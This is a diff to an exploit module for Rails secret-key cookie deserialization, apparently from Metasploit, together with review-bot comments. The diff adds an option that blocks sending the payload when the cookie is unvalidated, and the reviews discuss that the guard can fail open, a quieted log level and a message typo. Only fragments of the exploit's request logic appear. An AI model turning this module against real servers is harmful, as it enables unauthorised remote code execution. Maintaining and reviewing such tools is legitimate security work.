diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
index 3a7dbdadcd..15b2a0810f 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -136,6 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
 OptString.new('DIGEST_NAME', [ true, 'The digest type used to HMAC the session cookie','SHA1']),
 OptString.new('SALTENC', [ true, 'The encrypted cookie salt', 'encrypted cookie']),
 OptString.new('SALTSIG', [ true, 'The signed encrypted cookie salt', 'signed encrypted cookie']),
+ OptBool.new('VALIDATE_COOKIE', [ false, 'Only send the payload if the session cookie is validated', true]),
 ], self.class)
 end
@@ -252,14 +253,19 @@ class Metasploit3 < Msf::Exploit::Remote
 fail_with(Exploit::Failure::BadConfig, "SECRET does not match")
 end
 else
- print_status("Caution: Cookie not found, maybe you need to adjust TARGETURI")
+ print_warning("Caution: Cookie not found, maybe you need to adjust TARGETURI")
 if cookie_name.nil? || cookie_name.empty?
 # This prevents trying to send busted cookies with no name
 fail_with(Exploit::Failure::BadConfig, "No cookie found and no name given")
 end
- print_warning("Sending payload anyway! ;)")
+ if datastore['VALIDATE_COOKIE']
+ fail_with(Exploit::Failure::BadConfig, "COOKIE not validated, set VALIDATE_COOKIE to false send the payload without validation")
+ else
+ print_status("Trying to leverage default controller without cookie confirmation.")
+ end
 end
+ print_status "Sending cookie #{cookie_name}"
 res = send_request_cgi({
 'uri' => datastore['TARGETURI'] || "/",
 'method' => datastore['HTTP_METHOD'],
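Review bot: The new `VALIDATE_COOKIE` option is declared optional (`false` as the first array element) while the neighbouring options are all required, and the guard added in the second hunk is a plain truthiness test on `datastore['VALIDATE_COOKIE']`. If the value can end up empty or nil, the safety check would presumably be skipped without the operator having chosen that, so the guard fails open. Declaring it required keeps the default-on behaviour explicit: `OptBool.new('VALIDATE_COOKIE', [ true, 'Only send the payload if the session cookie is validated', true]),`. The enclosing option list starts outside this hunk.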
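Review bot: The unvalidated path in the new `else` branch is logged with `print_status`, whereas the line it replaces used `print_warning`. The one case where the operator has switched validation off and the request goes out against an unconfirmed target is therefore now the quieter one in the console output. I would keep it at warning level and say that validation was skipped: `print_warning("Cookie not validated (VALIDATE_COOKIE is false); sending without cookie confirmation.")`. The `fail_with` text above it is missing a word ("to false send"); `"Cookie not validated; set VALIDATE_COOKIE to false to send the payload without validation"` reads correctly. The added `print_status "Sending cookie #{cookie_name}"` also drops the parentheses that every other call in the hunk uses. The enclosing method begins and ends outside the hunk.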